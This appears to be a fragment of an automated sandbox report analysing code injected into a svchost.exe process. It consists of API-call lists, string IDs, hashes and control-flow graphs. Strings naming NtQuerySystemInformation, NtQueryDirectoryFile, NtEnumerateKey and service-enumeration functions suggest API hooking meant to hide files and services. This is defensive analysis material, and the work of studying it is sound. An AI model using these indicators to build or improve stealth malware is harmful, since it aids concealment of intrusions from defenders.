                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721828
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721848
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE2721863
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegOpenKeyExW.ADVAPI32 ref: 0000013DE2721883
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE272189E
                                                                                                                                                                                                                                                  • Part of subcall function 0000013DE2721630: RegCloseKey.ADVAPI32 ref: 0000013DE27218A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: ee3d420d2bed2a93ebf437c3b8b3650750b4b589fd8ec1a2115b6d7d2847829d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131FCB77106058AFB50BB27F9413E92BB4BB48BC0F1C4431DE098F697EE24CB51A654

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                • Opcode ID: 5937327315f5dacd8a69296d7de6a9ea1e39cbd8e21a565ac7b94a8f347e64da
                                                                                                                                                                                                                                                • Instruction ID: accbb15337b3c1a9c3f48d10cc4b64dd2beac0c0d08ebb25bebe2cae6af14786
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5937327315f5dacd8a69296d7de6a9ea1e39cbd8e21a565ac7b94a8f347e64da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F090F63032054DFE6577A2BD413E65AF94B98B80F1C64308D0A8E3C2EDACC7C0A210
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: c4422f5ad3ecd5474b844b9a0fa355b7ce543f68c9d0c8a1650c8f6f1dce4e95
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40314D76214B808AEB61AF61F8807EE7774F784744F54402ADA4E4BB98EF38C748D714
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: aa673ecea9234ec1e8bfbeb6c15acee4448dfc72735fc9ceeb0c65659b167b0f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36316D72214B808AEB61EF25F8403DE77B4F789754F540126EA9D4BBA9DF38C646CB00

                                                                                                                                                                                                                                                Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction ID: f20ba19593c990827f418985f895d93345b8695da60fdc658fd19179fa43d36d
• Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction Fuzzy Hash: 8231A1BA211A4AACEA05FF66FC517E56B30BB44344F940433D8190E172EF78C35AE390

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction ID: 58ce32f5426b21fd41caa2a0010e1167bec3a13205982a5c6b2ba52985821585
• Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
• Instruction Fuzzy Hash: 4541D073315A0059FA16FB26B8047D52BB1FB4ABE0F194139DD099F7A4EA38C745E305

Control-flow Graph

control_flow_graph 509 13de272104c-13de27210b9 RegQueryInfoKeyW 510 13de27210bf-13de27210c9 509->510 511 13de27211b5-13de27211d0 509->511 510->511 512 13de27210cf-13de272111f RegEnumValueW 510->512 513 13de27211a5-13de27211af 512->513 514 13de2721125-13de272112a 512->514 513->511 513->512 514->513 515 13de272112c-13de2721135 514->515 516 13de2721147-13de272114c 515->516 517 13de2721137 515->517 519 13de272114e-13de2721193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 516->519 520 13de2721199-13de27211a3 516->520 518 13de272113b-13de272113f 517->518 518->513 521 13de2721141-13de2721145 518->521 519->520 520->513 521->516 521->518
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: 82e34b841ad87f90b2aa9925f031613ffe6ac0b284e38c5b5e6a0650957d7bfb
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: E9416F73614B84CAE760EF21F44479E7BB1F388B98F548129DA890BB58DF38C649CB40

Control-flow Graph

APIs
• FlsGetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D5F7
• FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D616
• FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D63E
• FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D64F
• FlsSetValue.KERNEL32(?,?,?,0000013DE272CD4E,?,?,?,?,?,?,?,?,0000013DE272D50D,?,?,00000001), ref: 0000013DE272D660
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction ID: 5d2058687aeb95afa525a02ce3c7af05a5119e3058634ce727394fa105d65644
• Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
• Instruction Fuzzy Hash: 461182B27052408DFA58B7367E513EA29F2AB447F0F184334E87D4E7D6DE28D741A601

Control-flow Graph

control_flow_graph 547 13de2727520-13de2727526 548 13de2727561-13de272756b 547->548 549 13de2727528-13de272752b 547->549 552 13de2727688-13de272769d 548->552 550 13de272752d-13de2727530 549->550 551 13de2727555-13de2727594 call 13de2727bd0 549->551 553 13de2727532-13de2727535 550->553 554 13de2727548 __scrt_dllmain_crt_thread_attach 550->554 567 13de2727662 551->567 568 13de272759a-13de27275af call 13de2727a64 551->568 555 13de272769f 552->555 556 13de27276ac-13de27276c6 call 13de2727a64 552->556 558 13de2727541-13de2727546 call 13de2727b14 553->558 559 13de2727537-13de2727540 553->559 562 13de272754d-13de2727554 554->562 560 13de27276a1-13de27276ab 555->560 570 13de27276c8-13de27276f9 call 13de2727b8c call 13de2727a2c call 13de2727f14 call 13de2727d30 call 13de2727d54 call 13de2727bbc 556->570 571 13de27276fb-13de272772c call 13de2727d90 556->571 558->562 572 13de2727664-13de2727679 567->572 579 13de27275b5-13de27275c6 call 13de2727ad4 568->579 580 13de272767a-13de2727687 call 13de2727d90 568->580 570->560 581 13de272773d-13de2727743 571->581 582 13de272772e-13de2727734 571->582 600 13de2727617-13de2727621 call 13de2727d30 579->600 601 13de27275c8-13de27275ec call 13de2727ed8 call 13de2727a1c call 13de2727a48 call 13de272bd7c 579->601 580->552 587 13de2727745-13de272774f 581->587 588 13de272778a-13de27277a0 call 13de27232a0 581->588 582->581 586 13de2727736-13de2727738 582->586 594 13de272782b-13de2727838 586->594 595 13de2727751-13de2727759 587->595 596 13de272775b-13de2727769 call 13de2736380 587->596 608 13de27277a2-13de27277a4 588->608 609 13de27277d8-13de27277da 588->609 597 13de272776f-13de2727784 call 13de2727520 595->597 596->597 613 13de2727821-13de2727829 596->613 597->588 597->613 600->567 620 13de2727623-13de272762f call 13de2727d80 600->620 601->600 649 13de27275ee-13de27275f5 __scrt_dllmain_after_initialize_c 601->649 608->609 617 13de27277a6-13de27277c8 call 13de27232a0 call 13de2727688 608->617 610 13de27277e1-13de27277f6 call 13de2727520 609->610 611 13de27277dc-13de27277df 609->611 610->613 629 13de27277f8-13de2727802 610->629 611->610 611->613 613->594 617->609 644 13de27277ca-13de27277d2 call 13de2736380 617->644 637 13de2727631-13de272763b call 13de2727c98 620->637 638 13de2727655-13de2727660 620->638 634 13de272780d-13de272781d call 13de2736380 629->634 635 13de2727804-13de272780b 629->635 634->613 635->613 637->638 650 13de272763d-13de272764b 637->650 638->572 644->609 649->600 651 13de27275f7-13de2727614 call 13de272bd38 649->651 650->638 651->600
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction ID: f8c51aa5fac1f9f4583ff23cabd440589c9404a7d004e64d94a366c9525f117d
• Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
• Instruction Fuzzy Hash: CE81B5B3A046418EFB50BB6ABA423E96FF4A785780F544035DA494F796EB38CB45F700
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction ID: 8046d4e9ae6fd3bc76c15d9bda77b13380ab055a3b6b477710ca1f3904310728
• Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
• Instruction Fuzzy Hash: B031A072612740A9EF62BB42B8007D66BF4BB88BA0F690635DD5D4F390DF39C685A310
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 56ebee0f63c56cacf9816999bb7db2958f6d177600289cf9108ca15d13cdef78
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3113976704B418AFF25BB12F4496A96BB0FB88B95F240039DE890BB94EF3DC644D714
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-4180442734
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 8e5febeb5e99409d8a8def2e66279fb4802b0910a867b072e1e71e6861aa4715
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E316BB790DBC08EE352BB66B8552992FB0F789F40F298026DA840B347EA2597059744
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: a86168cc86fc74653fbe926c85dd27019b1feefbbb8973bbe713358a280c0fcd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B11D3B27052508EFA54B3367A553EA2AF66B447F4F140334E8360F7DADEA8C741A340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: 0e1045e0901578caeed5dd1647d26434383841e14dafe434a74e6992654085d4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56016971708A408AEB10FB12B8987996BB1F788BC0F984034DE5A4B755DF3CCB898704
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: efa53308daf18d89a0362a8febf9d24a61156a96b651ecdbfbafc5bfc733d08c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6F0C2723086809AEB20FB60F8D47DA6B71F758B88F984030CA494A959DF7CC78CDB04
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: 50fb1810f9b093a21abd42f558bc982d0d86821917b4bcc0f5ccdd06ec671138
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F08271718B8085EA14BB13B9141996B71EB48FD0F248030EE6A0BB18DF3CC7859714
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 338c25e0141dea10749522d8e0e6d7b3c03611f50317a1df8eb893623ce3689d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F06272215A0485EB11BB64F85539A6B70EB85B61F640239D66A4D1F4DF3CC348A354
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
• Instruction ID: 6fa04ed38e459616faa87eb6989cece4c95a83529e54b4c45d9d4ea689695fb0
• Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
• Instruction Fuzzy Hash: 7802EC73219B848AE764EB59F49039ABBB1F3C4794F104125EA8E87BA9DF7CC544DB00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction ID: 7cdfbae7086af1f9605070ff64a6857c7698b3e0db0677f3c1c4df5b5daeb4f5
• Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
• Instruction Fuzzy Hash: BD11E937A10A018DF66F3969F4713E51CB06B59378F340634AAB70E6E7CE248BC16104
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction ID: 7e03c071ae3d63c6aad6873193658a43c80a1f58e46b67610b6de0bd332fdea8
• Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
• Instruction Fuzzy Hash: 8951CC733116098EEB54FF95F444BA83BB2F744B88F508134EA8A4B789DB7ACA41D710
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction ID: 63fda26abc6198676af7175dbb78f8b0b78570552283441e53f84caea25de0d8
• Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
• Instruction Fuzzy Hash: 67619DB3504BC48AE771AF15F4403DABBB4F785B88F045625EB990BB99DB38C294DB00
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
• Instruction ID: 8381c4611c9bd71c1586b6f113c483f884f37dcbfecbfe0024d75a6f161059a6
• Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
• Instruction Fuzzy Hash: 6BD1B172714A808EE722EF65F4403EC3BB1F754B98F244225CE5DABB99DA34CA46D340
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
• Instruction ID: 264a528a6f3f269d4b5c4d99049e3f75b3c1b06e50a56728da50e3d8e8426a95
• Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
• Instruction Fuzzy Hash: 69112A32714F018AEB00EF60F8553E837B4F719758F440E31DA6D8A7A8DB78D2A89340
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
• Instruction ID: bbc7c948219a7feb5bbdef7df0ef4cc6af5694843480fbd47bc870989721aafd
• Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
• Instruction Fuzzy Hash: 7071B1B7204B8289EB35FE25B8443EA7BB5F384784F55003ADE094BB89DE35CB05A700
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2664314576.0000013DE2720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000013DE2720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_13de2720000_svchost.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
• Instruction ID: 9c0505371855fa0117c56295c7cbb962a51d66c403fcb1eddba89883083fd92f
